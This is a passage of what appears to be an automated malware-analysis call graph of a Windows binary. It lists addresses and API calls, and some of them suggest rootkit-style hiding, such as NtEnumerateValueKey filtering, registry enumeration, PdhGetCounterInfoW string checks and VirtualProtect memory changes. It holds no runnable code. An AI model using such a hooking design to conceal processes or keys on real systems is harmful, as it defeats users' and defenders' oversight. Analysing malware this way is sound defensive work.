calls 8946->8948 8949 2d0165edb74 __free_lconv_mon 11 API calls 8947->8949 8948->8947 8950 2d0165ed10b 8949->8950 8951 2d0165edb74 __free_lconv_mon 11 API calls 8950->8951 8952 2d0165ed118 8951->8952 8953 2d0165edb74 __free_lconv_mon 11 API calls 8952->8953 8954 2d0165ed125 8953->8954 8955 2d0165edb74 __free_lconv_mon 11 API calls 8954->8955 8956 2d0165ed132 8955->8956 8957 2d0165edb74 __free_lconv_mon 11 API calls 8956->8957 8958 2d0165ed13f 8957->8958 8959 2d0165edb74 __free_lconv_mon 11 API calls 8958->8959 8960 2d0165ed14c 8959->8960 8961 2d0165edb74 __free_lconv_mon 11 API calls 8960->8961 8962 2d0165ed159 8961->8962 8963 2d0165edb74 __free_lconv_mon 11 API calls 8962->8963 8964 2d0165ed169 8963->8964 8965 2d0165edb74 __free_lconv_mon 11 API calls 8964->8965 8966 2d0165ed179 8965->8966 8971 2d0165ecf64 8966->8971 8985 2d0165ecdcc EnterCriticalSection 8971->8985 7698 2d0165e2990 NtEnumerateValueKey 7699 2d0165e2a38 7698->7699 7701 2d0165e29dc 7698->7701 7700 2d0165e29ea NtEnumerateValueKey 7700->7701 7701->7699 7701->7700 7703 2d0165e3c74 7701->7703 7704 2d0165e3c96 7703->7704 7705 2d0165e3c81 StrCmpNIW 7703->7705 7704->7701 7705->7704 8751 2d0165e4010 8752 2d0165e3f5d _invalid_parameter_noinfo 8751->8752 8753 2d0165e3fad VirtualQuery 8752->8753 8754 2d0165e3fc7 8752->8754 8755 2d0165e4012 GetLastError 8752->8755 8753->8752 8753->8754 8755->8752 8755->8754 8756 2d0165f4e10 8757 2d0165f4e48 __GSHandlerCheckCommon 8756->8757 8758 2d0165f4e74 8757->8758 8760 2d0165ea16c 8757->8760 8761 2d0165e9a64 _CreateFrameInfo 9 API calls 8760->8761 8762 2d0165ea196 8761->8762 8763 2d0165e9a64 _CreateFrameInfo 9 API calls 8762->8763 8764 2d0165ea1a3 8763->8764 8765 2d0165e9a64 _CreateFrameInfo 9 API calls 8764->8765 8766 2d0165ea1ac 8765->8766 8766->8758 8987 2d0165f4e90 8997 2d0165e9418 8987->8997 8989 2d0165f4eb8 8991 2d0165e9a64 _CreateFrameInfo 9 API calls 8992 2d0165f4ec8 8991->8992 8993 2d0165e9a64 _CreateFrameInfo 9 API calls 8992->8993 8994 2d0165f4ed1 8993->8994 8995 2d0165ecad8 23 API calls 8994->8995 8996 2d0165f4eda 8995->8996 9000 2d0165e9448 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 8997->9000 8998 2d0165e9539 8998->8989 8998->8991 8999 2d0165e9504 RtlUnwindEx 8999->9000 9000->8998 9000->8999 9001 2d0165f50cf 9002 2d0165f5152 9001->9002 9003 2d0165f50e7 9001->9003 9003->9002 9004 2d0165e9a64 _CreateFrameInfo 9 API calls 9003->9004 9005 2d0165f5134 9004->9005 9006 2d0165e9a64 _CreateFrameInfo 9 API calls 9005->9006 9007 2d0165f5149 9006->9007 9008 2d0165ecad8 23 API calls 9007->9008 9008->9002 8230 2d0165e7f4c 8231 2d0165e7f70 __scrt_acquire_startup_lock 8230->8231 8232 2d0165ebd15 8231->8232 8233 2d0165ed3d0 __free_lconv_mon 11 API calls 8231->8233 8234 2d0165ebd3e 8233->8234 9009 2d0165edecc 9010 2d0165edef1 9009->9010 9020 2d0165edf08 9009->9020 9011 2d0165edadc __free_lconv_mon 11 API calls 9010->9011 9012 2d0165edef6 9011->9012 9014 2d0165ed9a0 _invalid_parameter_noinfo 49 API calls 9012->9014 9013 2d0165edfc0 9063 2d0165ec32c 9013->9063 9016 2d0165edf01 9014->9016 9019 2d0165ee020 9022 2d0165edb74 __free_lconv_mon 11 API calls 9019->9022 9020->9013 9023 2d0165edf55 9020->9023 9025 2d0165edf98 9020->9025 9041 2d0165ee110 9020->9041 9021 2d0165ee0b1 9026 2d0165edb74 __free_lconv_mon 11 API calls 9021->9026 9024 2d0165ee027 9022->9024 9027 2d0165edf78 9023->9027 9031 2d0165edb74 __free_lconv_mon 11 API calls 9023->9031 9024->9027 9032 2d0165edb74 __free_lconv_mon 11 API calls 9024->9032 9025->9027 9033 2d0165edb74 __free_lconv_mon 11 API calls 9025->9033 9029 2d0165ee0bc 9026->9029 9030 2d0165edb74 __free_lconv_mon 11 API calls 9027->9030 9028 2d0165ee052 9028->9021 9028->9028 9038 2d0165ee0f7 9028->9038 9069 2d0165f1380 9028->9069 9034 2d0165ee0d5 9029->9034 9037 2d0165edb74 __free_lconv_mon 11 API calls 9029->9037 9030->9016 9031->9023 9032->9024 9033->9025 9035 2d0165edb74 __free_lconv_mon 11 API calls 9034->9035 9035->9016 9037->9029 9039 2d0165ed9c0 _invalid_parameter_noinfo 17 API calls 9038->9039 9040 2d0165ee10c 9039->9040 9042 2d0165ee13e 9041->9042 9042->9042 9043 2d0165edafc __free_lconv_mon 11 API calls 9042->9043 9044 2d0165ee189 9043->9044 9045 2d0165f1380 49 API calls 9044->9045 9046 2d0165ee1bf 9045->9046 9047 2d0165ed9c0 _invalid_parameter_noinfo 17 API calls 9046->9047 9048 2d0165ee293 9047->9048 9049 2d0165ee5e4 23 API calls 9048->9049 9050 2d0165ee376 9049->9050 9078 2d0165ef9d8 9050->9078 9055 2d0165ee43d 9056 2d0165ee5e4 23 API calls 9055->9056 9057 2d0165ee46d 9056->9057 9058 2d0165ef9d8 5 API calls 9057->9058 9059 2d0165ee496 9058->9059 9103 2d0165edd40 9059->9103 9062 2d0165ee110 59 API calls 9064 2d0165ec344 9063->9064 9068 2d0165ec37c 9063->9068 9065 2d0165edafc __free_lconv_mon 11 API calls 9064->9065 9064->9068 9066 2d0165ec372 9065->9066 9067 2d0165edb74 __free_lconv_mon 11 API calls 9066->9067 9067->9068 9068->9019 9068->9028 9074 2d0165f139d 9069->9074 9070 2d0165f13a2 9071 2d0165f13b8 9070->9071 9072 2d0165edadc __free_lconv_mon 11 API calls 9070->9072 9071->9028 9073 2d0165f13ac 9072->9073 9075 2d0165ed9a0 _invalid_parameter_noinfo 49 API calls 9073->9075 9074->9070 9074->9071 9076 2d0165f13ec 9074->9076 9075->9071 9076->9071 9077 2d0165edadc __free_lconv_mon 11 API calls 9076->9077 9077->9073 9079 2d0165ef7c4 5 API calls 9078->9079 9080 2d0165ee3a1 9079->9080 9081 2d0165edbc4 9080->9081 9082 2d0165edbee 9081->9082 9083 2d0165edc12 9081->9083 9087 2d0165edb74 __free_lconv_mon 11 API calls 9082->9087 9088 2d0165edbfd FindFirstFileExW 9082->9088 9084 2d0165edc6c 9083->9084 9085 2d0165edc17 9083->9085 9086 2d0165ef4ac MultiByteToWideChar 9084->9086 9085->9088 9089 2d0165edc2c 9085->9089 9090 2d0165edb74 __free_lconv_mon 11 API calls 9085->9090 9094 2d0165edc88 9086->9094 9087->9088 9088->9055 9091 2d0165ece3c 12 API calls 9089->9091 9090->9089 9091->9088 9092 2d0165edc8f GetLastError 9125 2d0165eda50 9092->9125 9094->9092 9097 2d0165edb74 __free_lconv_mon 11 API calls 9094->9097 9101 2d0165edcbd 9094->9101 9102 2d0165edcca 9094->9102 9095 2d0165ef4ac MultiByteToWideChar 9099 2d0165edd0e 9095->9099 9097->9101 9098 2d0165ece3c 12 API calls 9098->9102 9099->9088 9099->9092 9100 2d0165edadc __free_lconv_mon 11 API calls 9100->9088 9101->9098 9102->9088 9102->9095 9104 2d0165edd8e 9103->9104 9106 2d0165edd6a 9103->9106 9105 2d0165edde8 9104->9105 9107 2d0165edd94 9104->9107 9108 2d0165ef53c WideCharToMultiByte 9105->9108 9109 2d0165edb74 __free_lconv_mon 11 API calls 9106->9109 9111 2d0165edd79 9106->9111 9110 2d0165edda9 9107->9110 9107->9111 9112 2d0165edb74 __free_lconv_mon 11 API calls 9107->9112 9118 2d0165ede0c 9108->9118 9109->9111 9113 2d0165ece3c 12 API calls 9110->9113 9111->9062 9112->9110 9113->9111 9114 2d0165ede13 GetLastError 9116 2d0165eda50 11 API calls 9114->9116 9115 2d0165ede50 9115->9111 9120 2d0165ef53c WideCharToMultiByte 9115->9120 9117 2d0165ede20 9116->9117 9121 2d0165edadc __free_lconv_mon 11 API calls 9117->9121 9118->9114 9118->9115 9119 2d0165ede44 9118->9119 9122 2d0165edb74 __free_lconv_mon 11 API calls 9118->9122 9123 2d0165ece3c 12 API calls 9119->9123 9124 2d0165ede9c 9120->9124 9121->9111 9122->9119 9123->9115 9124->9111 9124->9114 9126 2d0165ed3d0 __free_lconv_mon 11 API calls 9125->9126 9127 2d0165eda5d __free_lconv_mon 9126->9127 9128 2d0165ed3d0 __free_lconv_mon 11 API calls 9127->9128 9129 2d0165eda7f 9128->9129 9129->9100 7546 2d0165e1ac8 7553 2d0165e1628 GetProcessHeap HeapAlloc 7546->7553 7548 2d0165e1ad7 7549 2d0165e1ade SleepEx 7548->7549 7552 2d0165e1598 StrCmpIW StrCmpW 7548->7552 7604 2d0165e18b4 7548->7604 7550 2d0165e1628 50 API calls 7549->7550 7550->7548 7552->7548 7621 2d0165e1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7553->7621 7555 2d0165e1650 7622 2d0165e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7555->7622 7557 2d0165e1658 7623 2d0165e1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7557->7623 7559 2d0165e1661 7624 2d0165e1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7559->7624 7561 2d0165e166a 7625 2d0165e1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7561->7625 7563 2d0165e1673 7626 2d0165e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7563->7626 7565 2d0165e167c 7627 2d0165e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7565->7627 7567 2d0165e1685 7628 2d0165e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7567->7628 7569 2d0165e168e RegOpenKeyExW 7570 2d0165e18a6 7569->7570 7571 2d0165e16c0 RegOpenKeyExW 7569->7571 7570->7548 7572 2d0165e16ff RegOpenKeyExW 7571->7572 7573 2d0165e16e9 7571->7573 7575 2d0165e173a RegOpenKeyExW 7572->7575 7576 2d0165e1723 7572->7576 7635 2d0165e12bc RegQueryInfoKeyW 7573->7635 7577 2d0165e175e 7575->7577 7578 2d0165e1775 RegOpenKeyExW 7575->7578 7629 2d0165e104c RegQueryInfoKeyW 7576->7629 7582 2d0165e12bc 16 API calls 7577->7582 7583 2d0165e1799 7578->7583 7584 2d0165e17b0 RegOpenKeyExW 7578->7584 7585 2d0165e176b RegCloseKey 7582->7585 7586 2d0165e12bc 16 API calls 7583->7586 7587 2d0165e17eb RegOpenKeyExW 7584->7587 7588 2d0165e17d4 7584->7588 7585->7578 7589 2d0165e17a6 RegCloseKey 7586->7589 7591 2d0165e180f 7587->7591 7592 2d0165e1826 RegOpenKeyExW 7587->7592 7590 2d0165e12bc 16 API calls 7588->7590 7589->7584 7595 2d0165e17e1 RegCloseKey 7590->7595 7596 2d0165e104c 6 API calls 7591->7596 7593 2d0165e184a 7592->7593 7594 2d0165e1861 RegOpenKeyExW 7592->7594 7598 2d0165e104c 6 API calls 7593->7598 7599 2d0165e189c RegCloseKey 7594->7599 7600 2d0165e1885 7594->7600 7595->7587 7597 2d0165e181c RegCloseKey 7596->7597 7597->7592 7601 2d0165e1857 RegCloseKey 7598->7601 7599->7570 7602 2d0165e104c 6 API calls 7600->7602 7601->7594 7603 2d0165e1892 RegCloseKey 7602->7603 7603->7599 7649 2d0165e14a4 7604->7649 7621->7555 7622->7557 7623->7559 7624->7561 7625->7563 7626->7565 7627->7567 7628->7569 7630 2d0165e10bf 7629->7630 7631 2d0165e11b5 RegCloseKey 7629->7631 7630->7631 7632 2d0165e10cf RegEnumValueW 7630->7632 7631->7575 7633 2d0165e1125 7632->7633 7633->7631 7633->7632 7634 2d0165e114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7633->7634 7634->7633 7636 2d0165e148a RegCloseKey 7635->7636 7637 2d0165e1327 GetProcessHeap HeapAlloc 7635->7637 7636->7572 7638 2d0165e1476 GetProcessHeap HeapFree 7637->7638 7639 2d0165e1352 RegEnumValueW 7637->7639 7638->7636 7640 2d0165e13a5 7639->7640 7640->7638 7640->7639 7642 2d0165e141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 7640->7642 7643 2d0165e13d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7640->7643 7644 2d0165e152c 7640->7644 7642->7640 7643->7642 7645 2d0165e157c 7644->7645 7646 2d0165e1546 7644->7646 7645->7640 7646->7645 7647 2d0165e155d StrCmpIW 7646->7647 7648 2d0165e1565 StrCmpW 7646->7648 7647->7646 7648->7646 7650 2d0165e14e1 GetProcessHeap HeapFree GetProcessHeap HeapFree 7649->7650 7651 2d0165e14c1 GetProcessHeap HeapFree 7649->7651 7651->7650 7651->7651 9130 2d0165f52c9 9131 2d0165e9a64 _CreateFrameInfo 9 API calls 9130->9131 9132 2d0165f52d7 9131->9132 9133 2d0165e9a64 _CreateFrameInfo 9 API calls 9132->9133 9134 2d0165f52e2 9132->9134 9133->9134 8634 2d0165f41c8 8635 2d0165f41df 8634->8635 8636 2d0165f41d9 CloseHandle 8634->8636 8636->8635 9135 2d0165e28c4 9137 2d0165e290a 9135->9137 9136 2d0165e2970 9137->9136 9138 2d0165e3c74 StrCmpNIW 9137->9138 9138->9137 8767 2d0165eb444 8768 2d0165e9a64 _CreateFrameInfo 9 API calls 8767->8768 8769 2d0165eb479 8768->8769 8770 2d0165e9a64 _CreateFrameInfo 9 API calls 8769->8770 8771 2d0165eb487 __except_validate_context_record 8770->8771 8772 2d0165e9a64 _CreateFrameInfo 9 API calls 8771->8772 8773 2d0165eb4cb 8772->8773 8774 2d0165e9a64 _CreateFrameInfo 9 API calls 8773->8774 8775 2d0165eb4d4 8774->8775 8776 2d0165e9a64 _CreateFrameInfo 9 API calls 8775->8776 8777 2d0165eb4dd 8776->8777 8790 2d0165ea084 8777->8790 8780 2d0165e9a64 _CreateFrameInfo 9 API calls 8781 2d0165eb50d __CxxCallCatchBlock 8780->8781 8782 2d0165ea0c0 __CxxCallCatchBlock 9 API calls 8781->8782 8787 2d0165eb5be 8782->8787 8783 2d0165eb5e7 __CxxCallCatchBlock 8784 2d0165e9a64 _CreateFrameInfo 9 API calls 8783->8784 8785 2d0165eb5fa 8784->8785 8786 2d0165e9a64 _CreateFrameInfo 9 API calls 8785->8786 8789 2d0165eb603 8786->8789 8787->8783 8788 2d0165e9750 __CxxCallCatchBlock 9 API calls 8787->8788 8788->8783 8791 2d0165e9a64 _CreateFrameInfo 9 API calls 8790->8791 8792 2d0165ea095 8791->8792 8793 2d0165e9a64 _CreateFrameInfo 9 API calls 8792->8793 8795 2d0165ea0a0 8792->8795 8793->8795 8794 2d0165e9a64 _CreateFrameInfo 9 API calls 8796 2d0165ea0b1 8794->8796 8795->8794 8796->8780 8796->8781 9139 2d0165e7ec0 9140 2d0165e7ec9 __scrt_acquire_startup_lock 9139->9140 9142 2d0165e7ecd 9140->9142 9143 2d0165ec38c 9140->9143 9144 2d0165ec3ac 9143->9144 9173 2d0165ec3c3 9143->9173 9145 2d0165ec3ca 9144->9145 9146 2d0165ec3b4 9144->9146 9147 2d0165ef0c0 69 API calls 9145->9147 9148 2d0165edadc __free_lconv_mon 11 API calls 9146->9148 9149 2d0165ec3cf 9147->9149 9150 2d0165ec3b9 9148->9150 9174 2d0165ee7a4 GetModuleFileNameW 9149->9174 9151 2d0165ed9a0 _invalid_parameter_noinfo 49 API calls 9150->9151 9151->9173 9156 2d0165ec32c 11 API calls 9157 2d0165ec439 9156->9157 9158 2d0165ec459 9157->9158 9159 2d0165ec441 9157->9159 9160 2d0165ec164 23 API calls 9158->9160 9161 2d0165edadc __free_lconv_mon 11 API calls 9159->9161 9166 2d0165ec475 9160->9166 9162 2d0165ec446 9161->9162 9163 2d0165edb74 __free_lconv_mon 11 API calls 9162->9163 9163->9173 9164 2d0165ec47b 9165 2d0165edb74 __free_lconv_mon 11 API calls 9164->9165 9165->9173 9166->9164 9167 2d0165ec4a7 9166->9167 9168 2d0165ec4c0 9166->9168 9169 2d0165edb74 __free_lconv_mon 11 API calls 9167->9169 9170 2d0165edb74 __free_lconv_mon 11 API calls 9168->9170 9171 2d0165ec4b0 9169->9171 9170->9164 9172 2d0165edb74 __free_lconv_mon 11 API calls 9171->9172 9172->9173 9173->9142 9175 2d0165ee7fd 9174->9175 9176 2d0165ee7e9 GetLastError 9174->9176 9178 2d0165ee5e4 23 API calls 9175->9178 9177 2d0165eda50 11 API calls 9176->9177 9185 2d0165ee7f6 9177->9185 9179 2d0165ee82b 9178->9179 9180 2d0165ef9d8 5 API calls 9179->9180 9182 2d0165ee83c 9179->9182 9180->9182 9181 2d0165e7d70 _log10_special 8 API calls 9184 2d0165ec3e6 9181->9184 9192 2d0165ee688 9182->9192 9186 2d0165ec164 9184->9186 9185->9181 9188 2d0165ec1a2 9186->9188 9190 2d0165ec20e 9188->9190 9206 2d0165ef470 9188->9206 9189 2d0165ec2ff 9189->9156 9190->9189 9191 2d0165ef470 23 API calls 9190->9191 9191->9190 9193 2d0165ee6c7 9192->9193 9199 2d0165ee6ac 9192->9199 9194 2d0165ee6cc 9193->9194 9195 2d0165ef53c WideCharToMultiByte 9193->9195 9198 2d0165edadc __free_lconv_mon 11 API calls 9194->9198 9194->9199 9196 2d0165ee723 9195->9196 9196->9194 9197 2d0165ee72a GetLastError 9196->9197 9201 2d0165ee755 9196->9201 9200 2d0165eda50 11 API calls 9197->9200 9198->9199 9199->9185 9202 2d0165ee737 9200->9202 9203 2d0165ef53c WideCharToMultiByte 9201->9203 9204 2d0165edadc __free_lconv_mon 11 API calls 9202->9204 9205 2d0165ee77c 9203->9205 9204->9199 9205->9197 9205->9199 9207 2d0165ef3fc 9206->9207 9208 2d0165ee5e4 23 API calls 9207->9208 9209 2d0165ef420 9208->9209 9209->9188 8235 2d0165eb53e 8248 2d0165e9a64 8235->8248 8237 2d0165eb58f RaiseException 8239 2d0165eb5b6 8237->8239 8238 2d0165eb54b __CxxCallCatchBlock 8238->8237 8251 2d0165ea0c0 8239->8251 8241 2d0165eb5e7 __CxxCallCatchBlock 8242 2d0165e9a64 _CreateFrameInfo 9 API calls 8241->8242 8243 2d0165eb5fa 8242->8243 8244 2d0165e9a64 _CreateFrameInfo 9 API calls 8243->8244 8247 2d0165eb603 8244->8247 8262 2d0165e9a80 8248->8262 8250 2d0165e9a6d 8250->8238 8252 2d0165e9a64 _CreateFrameInfo 9 API calls 8251->8252 8253 2d0165ea0d2 8252->8253 8254 2d0165ea10d 8253->8254 8255 2d0165e9a64 _CreateFrameInfo 9 API calls 8253->8255 8256 2d0165ea0dd 8255->8256 8256->8254 8257 2d0165e9a64 _CreateFrameInfo 9 API calls 8256->8257 8258 2d0165ea0fe 8257->8258 8258->8241 8259 2d0165e9750 8258->8259 8260 2d0165e9a64 _CreateFrameInfo 9 API calls 8259->8260 8261 2d0165e975e 8260->8261 8261->8241 8263 2d0165e9a9f GetLastError 8262->8263 8264 2d0165e9a98 8262->8264 8274 2d0165ea3d4 8263->8274 8264->8250 8278 2d0165ea1f4 8274->8278 8279 2d0165ea30e TlsGetValue 8278->8279 8285 2d0165ea238 __vcrt_InitializeCriticalSectionEx 8278->8285 8280 2d0165ea266 LoadLibraryExW 8282 2d0165ea2dd 8280->8282 8283 2d0165ea287 GetLastError 8280->8283 8281 2d0165ea2fd GetProcAddress 8281->8279 8282->8281 8284 2d0165ea2f4 FreeLibrary 8282->8284 8283->8285 8284->8281 8285->8279 8285->8280 8285->8281 8286 2d0165ea2a9 LoadLibraryExW 8285->8286 8286->8282 8286->8285 9210 2d0165e30bc 9211 2d0165e30ec 9210->9211 9212 2d0165e31a5 9211->9212 9213 2d0165e3109 PdhGetCounterInfoW 9211->9213 9213->9212 9214 2d0165e3127 GetProcessHeap HeapAlloc PdhGetCounterInfoW 9213->9214 9215 2d0165e3159 StrCmpW 9214->9215 9216 2d0165e3191 GetProcessHeap HeapFree 9214->9216 9215->9216 9218 2d0165e316e 9215->9218 9216->9212 9217 2d0165e3554 12 API calls 9217->9218 9218->9216 9218->9217 9219 2d0165e5cbc 9220 2d0165e5cc3 9219->9220 9221 2d0165e5cf0 VirtualProtect 9220->9221 9223 2d0165e5c00 9220->9223 9222 2d0165e5d19 GetLastError 9221->9222 9221->9223 9222->9223 8637 2d0165ec9bc 8638 2d0165ec9d5 8637->8638 8639 2d0165ec9ed 8637->8639 8638->8639 8640 2d0165edb74 __free_lconv_mon 11 API calls 8638->8640 8640->8639 9224 2d0165efebc 9225 2d0165efec8 9224->9225 9227 2d0165efeef 9225->9227 9228 2d0165f20ec 9225->9228 9229 2d0165f212c 9228->9229 9230 2d0165f20f1 9228->9230 9229->9225 9231 2d0165f2124 9230->9231 9232 2d0165f2112 DeleteCriticalSection 9230->9232 9233 2d0165edb74 __free_lconv_mon 11 API calls 9231->9233 9232->9231 9232->9232 9233->9229 8641 2d0165f07b8 8642 2d0165f07c3 8641->8642 8650 2d0165f30b8 8642->8650 8663 2d0165ecdcc EnterCriticalSection 8650->8663 8287 2d0165e2334 GetProcessIdOfThread GetCurrentProcessId 8288 2d0165e235f CreateFileW 8287->8288 8289 2d0165e23da 8287->8289 8288->8289 8290 2d0165e2393 WriteFile ReadFile CloseHandle 8288->8290 8290->8289 9234 2d0165f52b3 9237 2d0165e97a4 9234->9237 9238 2d0165e97ce 9237->9238 9239 2d0165e97bc 9237->9239 9241 2d0165e9a64 _CreateFrameInfo 9 API calls 9238->9241 9239->9238 9240 2d0165e97c4 9239->9240 9242 2d0165e97cc 9240->9242 9244 2d0165e9a64 _CreateFrameInfo 9 API calls 9240->9244 9243 2d0165e97d3 9241->9243 9243->9242 9246 2d0165e9a64 _CreateFrameInfo 9 API calls 9243->9246 9245 2d0165e97f3 9244->9245 9247 2d0165e9a64 _CreateFrameInfo 9 API calls 9245->9247 9246->9242 9248 2d0165e9800 9247->9248 9249 2d0165ecad8 23 API calls 9248->9249 9250 2d0165e9809 9249->9250 9251 2d0165ecad8 23 API calls 9250->9251 9252 2d0165e9815 9251->9252 8664 2d0165e2b68 8666 2d0165e2bc5 8664->8666 8665 2d0165e2be0 8666->8665 8667 2d0165e34ac 3 API calls 8666->8667 8667->8665 7652 2d0165e3ee9 7655 2d0165e3e36 _invalid_parameter_noinfo 7652->7655 7653 2d0165e3ea0 7654 2d0165e3e86 VirtualQuery 7654->7653 7654->7655 7655->7653 7655->7654 7656 2d0165e3eba VirtualAlloc 7655->7656 7656->7653 7657 2d0165e3eeb GetLastError 7656->7657 7657->7655 8291 2d0165e5ce9 8292 2d0165e5cf0 VirtualProtect 8291->8292 8293 2d0165e5d19 GetLastError 8292->8293 8294 2d0165e5c00 8292->8294 8293->8294 8668 2d0165f5165 8669 2d0165e9a64 _CreateFrameInfo 9 API calls 8668->8669 8670 2d0165f517d 8669->8670 8671 2d0165e9a64 _CreateFrameInfo 9 API calls 8670->8671 8672 2d0165f5198 8671->8672 8673 2d0165e9a64 _CreateFrameInfo 9 API calls 8672->8673 8674 2d0165f51ac 8673->8674 8675 2d0165e9a64 _CreateFrameInfo 9 API calls 8674->8675 8676 2d0165f51ee 8675->8676 8803 2d0165e83e4 8804 2d0165e9818 __std_exception_copy 49 API calls 8803->8804 8805 2d0165e840d 8804->8805 9253 2d0165e5664 9254 2d0165e566a 9253->9254 9265 2d0165e7ca0 9254->9265 9258 2d0165e56ce 9260 2d0165e5767 _invalid_parameter_noinfo 9260->9258 9262 2d0165e58ed 9260->9262 9278 2d0165e7870 9260->9278 9261 2d0165e59eb 9262->9261 9263 2d0165e5a67 VirtualProtect 9262->9263 9263->9258 9264 2d0165e5a93 GetLastError 9263->9264 9264->9258 9266 2d0165e7cab 9265->9266 9267 2d0165e56ad 9266->9267 9268 2d0165ebc8c __free_lconv_mon 2 API calls 9266->9268 9269 2d0165e7cca 9266->9269 9267->9258 9274 2d0165e40f0 9267->9274 9268->9266 9272 2d0165e7cd5 9269->9272 9284 2d0165e84cc 9269->9284 9288 2d0165e84ec 9272->9288 9275 2d0165e410d 9274->9275 9277 2d0165e417c _invalid_parameter_noinfo 9275->9277 9292 2d0165e4360 9275->9292 9277->9260 9279 2d0165e78b7 9278->9279 9317 2d0165e7640 9279->9317 9282 2d0165e7d70 _log10_special 8 API calls 9283 2d0165e78e1 9282->9283 9283->9260 9285 2d0165e84da std::bad_alloc::bad_alloc 9284->9285 9286 2d0165e98d0 Concurrency::cancel_current_task 2 API calls 9285->9286 9287 2d0165e84eb 9286->9287 9289 2d0165e84fa std::bad_alloc::bad_alloc 9288->9289 9290 2d0165e98d0 Concurrency::cancel_current_task 2 API calls 9289->9290 9291 2d0165e7cdb 9290->9291 9293 2d0165e43a7 9292->9293 9294 2d0165e4384 9292->9294 9295 2d0165e43dd 9293->9295 9312 2d0165e3f40 9293->9312 9294->9293 9306 2d0165e3e10 9294->9306 9298 2d0165e3f40 2 API calls 9295->9298 9299 2d0165e440d 9295->9299 9298->9299 9303 2d0165e3e10 3 API calls 9299->9303 9305 2d0165e4443 9299->9305 9300 2d0165e3e10 3 API calls 9301 2d0165e445f 9300->9301 9302 2d0165e447b 9301->9302 9304 2d0165e3f40 2 API calls 9301->9304 9302->9277 9303->9305 9304->9302 9305->9300 9305->9301 9309 2d0165e3e31 _invalid_parameter_noinfo 9306->9309 9307 2d0165e3ea0 9307->9293 9308 2d0165e3e86 VirtualQuery 9308->9307 9308->9309 9309->9307 9309->9308 9310 2d0165e3eba VirtualAlloc 9309->9310 9310->9307 9311 2d0165e3eeb GetLastError 9310->9311 9311->9309 9314 2d0165e3f58 _invalid_parameter_noinfo 9312->9314 9313 2d0165e3fad VirtualQuery 9313->9314 9315 2d0165e3fc7 9313->9315 9314->9313 9314->9315 9316 2d0165e4012 GetLastError 9314->9316 9315->9295 9316->9314 9316->9315 9318 2d0165e765b 9317->9318 9319 2d0165e767f 9318->9319 9320 2d0165e7671 SetLastError 9318->9320 9319->9282 9320->9319 9321 2d0165e9664 9328 2d0165e9bac 9321->9328 9324 2d0165e9671 9329 2d0165e9bb4 9328->9329 9331 2d0165e9be5 9329->9331 9332 2d0165e966d 9329->9332 9345 2d0165ea470 9329->9345 9333 2d0165e9bf4 __vcrt_uninitialize_locks DeleteCriticalSection 9331->9333 9332->9324 9334 2d0165e9b40 9332->9334 9333->9332 9350 2d0165ea344 9334->9350 9346 2d0165ea1f4 __vcrt_InitializeCriticalSectionEx 5 API calls 9345->9346 9347 2d0165ea4a6 9346->9347 9348 2d0165ea4bb InitializeCriticalSectionAndSpinCount 9347->9348 9349 2d0165ea4b0 9347->9349 9348->9349 9349->9329 9351 2d0165ea1f4 __vcrt_InitializeCriticalSectionEx 5 API calls 9350->9351 9352 2d0165ea369 TlsAlloc 9351->9352 8677 2d0165ec964 8680 2d0165ec714 8677->8680 8687 2d0165ec6dc 8680->8687 8685 2d0165ec698 11 API calls 8686 2d0165ec747 8685->8686 8688 2d0165ec6ec 8687->8688 8689 2d0165ec6f1 8687->8689 8690 2d0165ec698 11 API calls 8688->8690 8691 2d0165ec6f8 8689->8691 8690->8689 8692 2d0165ec70d 8691->8692 8693 2d0165ec708 8691->8693 8692->8685 8694 2d0165ec698 11 API calls 8693->8694 8694->8692 9354 2d0165e7c60 9355 2d0165e7c7c 9354->9355 9356 2d0165e7c81 9354->9356 9358 2d0165e7d90 9355->9358 9359 2d0165e7e27 9358->9359 9360 2d0165e7db3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9358->9360 9359->9356 9360->9359 9361 2d0165efc60 GetProcessHeap 8806 2d0165f39db 8807 2d0165f3a1b 8806->8807 8809 2d0165f3c80 8806->8809 8808 2d0165f3c62 8807->8808 8807->8809 8811 2d0165f3a4f 8807->8811 8814 2d0165f4790 8808->8814 8810 2d0165f3c76 8809->8810 8813 2d0165f4790 _log10_special 20 API calls 8809->8813 8813->8810 8817 2d0165f47b0 8814->8817 8819 2d0165f47ca 8817->8819 8818 2d0165f47ab 8818->8810 8819->8818 8821 2d0165f45f0 8819->8821 8822 2d0165f4630 _log10_special 8821->8822 8823 2d0165f469c _log10_special 8822->8823 8832 2d0165f48b0 8822->8832 8825 2d0165f46d9 8823->8825 8826 2d0165f46a9 8823->8826 8839 2d0165f4be0 8825->8839 8835 2d0165f44cc 8826->8835 8829 2d0165f46d7 _log10_special 8830 2d0165e7d70 _log10_special 8 API calls 8829->8830 8831 2d0165f4701 8830->8831 8831->8818 8845 2d0165f48d8 8832->8845 8836 2d0165f4510 _log10_special 8835->8836 8837 2d0165f4525 8836->8837 8838 2d0165f4be0 _log10_special 11 API calls 8836->8838 8837->8829 8838->8837 8840 2d0165f4be9 8839->8840 8841 2d0165f4c00 8839->8841 8843 2d0165edadc __free_lconv_mon 11 API calls 8840->8843 8844 2d0165f4bf8 8840->8844 8842 2d0165edadc __free_lconv_mon 11 API calls 8841->8842 8842->8844 8843->8844 8844->8829 8846 2d0165f4917 _raise_exc _clrfp 8845->8846 8847 2d0165f4b2c RaiseException 8846->8847 8848 2d0165f48d2 8847->8848 8848->8823 9362 2d0165e2a58 9364 2d0165e2aac 9362->9364 9363 2d0165e2ac7 9364->9363 9366 2d0165e33f8 9364->9366 9367 2d0165e348e 9366->9367 9369 2d0165e341d 9366->9369 9367->9363 9368 2d0165e3c74 StrCmpNIW 9368->9369 9369->9367 9369->9368 9370 2d0165e1d0c StrCmpIW StrCmpW 9369->9370 9370->9369 8695 